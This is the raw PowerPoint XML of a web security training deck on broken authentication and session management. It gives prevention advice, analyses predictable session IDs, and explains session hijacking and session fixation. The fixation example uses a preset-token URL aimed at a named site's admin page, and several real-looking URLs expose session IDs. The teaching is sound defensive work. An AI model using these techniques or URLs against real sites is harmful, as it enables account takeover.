              <a:t>7. Broken Authentication and Session Management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763000" cy="5638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altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Prevention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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Defense in depth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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Well defined role based and granular access control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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Use common session management mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Do not roll your own unless there is a very good reason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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Do not accept new, preset or invalid session identifier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Regenerate a new session upon successful authentication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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Use a single, strong, authentication mechanism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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Do not allow the login process to start from an unencrypted page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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Ensure every page has a logout link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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Use a timeout period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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Correlate session IDs to a individual user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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Protect ancillary authentication information the same way one protects passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>. questions and answers for password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>reset</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Do not expose any session identifiers or any portion of valid credentials in URLs or logs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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Be careful of sending secrets to registered email addresses </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Be careful of allowing users to change  their email address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Perhaps sent a message to the previous email address before enacting the change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1600" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Accidental Session ID Denial of Service Attacks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7620000" cy="4429125"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>A commercial site is running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>BroadVision</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Application Server: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 dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Sample cookies (BV_IDS)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ccddadcmmlflldecflfcfmgdglndfkn.0:@@@@0428436698.1099845335@@@@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ccccadcmmlflijgcflfcfmgdglndfkm.0:@@@@0460548002.1099846334@@@@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 dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>&lt;server instance ID&gt;.0:@@@@&lt;random number&gt;.&lt;clock tick&gt;@@@@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 dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Mozilla was setup to deny cookies from the site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>The site was setup to redirect any user without a BV_IDS cookie to a no-cookie page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>The no-cookie page redirects the user back to the initial page, creates a redirect loop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Over 20,000 requests were issued from one IP, and 20,000 different sessions were created</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>When the hourly session clean up occurred, the server hung due to the number of sessions created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 dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Most newer versions of Mozilla/IE browser have a redirect limit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 fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Session ID in URL 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772400" cy="4953000"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill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smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>The use of session ID in the URL should be discouraged.  The URL can be </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>cached by a search engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Recorded in proxy logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Retained in URL dropdown list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック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smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>A search in the google for site, with sessionID “inurl:sessionID” in the URL and the word “shopping cart”, turns up 112,000 entries.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 smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック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smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.purposedrivenlife.com/basket.aspx?UserID=228473&amp;SessionID=2jQvliAq0Jb24SXYu2kF&amp;SID=1&amp;Category_ID=2&amp;Product_ID=95</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック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smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://ue.eu.int/cms3_applications/applications/librarie/freeBookShop.asp?SessionID=201241131271825256632533-706011819&amp;LANG=EN&amp;BookType=1&amp;SessLang=EN&amp;cmsID=544</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック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smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.systematika.it/results.asp?SKU_PUBLISHER=CPB1360WWFS180&amp;SessionID=1073331003</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック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400" smtClean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 fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Session ID Analysis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915400" cy="4495800"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill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altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>What do you notice about this session id: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altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128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400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>http://www.securehq.com/superdept.wml&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>sessionid=201210912413626981</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&amp;superdeptid=30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 fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Session ID Analysis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495800"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill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altLang="en-US" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>What do you notice about this session id:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128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200" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>http://www.securehq.com/superdept.wml&amp;sessionid=201210912413626981&amp;superdeptid=30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altLang="en-US" sz="1600" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>What do you notice now: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altLang="en-US" sz="1600" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="Courier New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urier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>201210912413626981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urier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>201211711192314454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urier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>201211711203214472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urier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>201211711211114480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urier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>201211711215014488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urier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>201211711222814508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urier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>201211711253414520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urier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>201211711295414547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urier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>201211711333214562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altLang="en-US" sz="1600" smtClean="0"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 fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Session ID Analysis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495800"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>http://www.securehq.com/superdept.wml&amp;sessionid=201210912413626981&amp;superdeptid=30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altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128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dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>201210912413626981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dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>201211711192314454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dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>201211711203214472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dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>201211711211114480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dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>201211711215014488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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>201211711</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>22281</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>4508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dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>201211711253414520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dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>201211711295414547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dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>201211711333214562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altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128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dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>2012 - Year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dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>11 - Month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dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>7 - Date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dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>11 – Hour (??)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dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>22281 -  (Unknown)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dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>4508 – Incremental Value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altLang="en-US" sz="700" dirty="0" smtClean="0"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charset="-128"/>
              </a:rPr>
              <a:t>Session Hijacking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  <a:solidFill>
            <a:srgbClr val="FFFFFF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 sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Session Hijacking – Capturing the session cookies and assume the identity of another user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>The session ID can be gained using Cross-Site Scripting attack </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>The session ID can be brute forced </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>To test for session hijacking attacks are usually done using two separate browsers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Mozilla/Netscape/Firefox – Uses shared memory for cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Internet Explorer – Uses separate memory for each newly created instance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charset="-128"/>
              </a:rPr>
              <a:t>Session Fixation Attack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81200"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill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smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Session Fixation Attack is the idea of induce an application to inadvertently accept a Session ID set by the User.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smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.net-security.org/dl/articles/session_fixation.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128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 smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック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smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>An attacker sets a pre-determined Session ID in the URL, persuade the unsuspecting user to authenticate, and hijack the session.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 smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック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smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Example: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smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://dentistry.superlinks.com/admin/main.cfm?CFID=000000&amp;CFTOKEN=000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> 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 smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック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smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Sent the link to an unsuspecting user, and the user authenticates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smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>The 000000 value for CFID/CFTOKEN becomes a valid session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smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Someone can hijack the session using the known session ID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7467600" cy="792163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>8. Ensure Cryptographic Storage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828800"/>
            <a:ext cx="7467600" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Web applications rarely use cryptographic functions properly to protect data and credentials. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Attackers use weakly protected data to conduct identity theft and other crimes, such as credit card fraud.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Common examples include</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Not encrypting sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
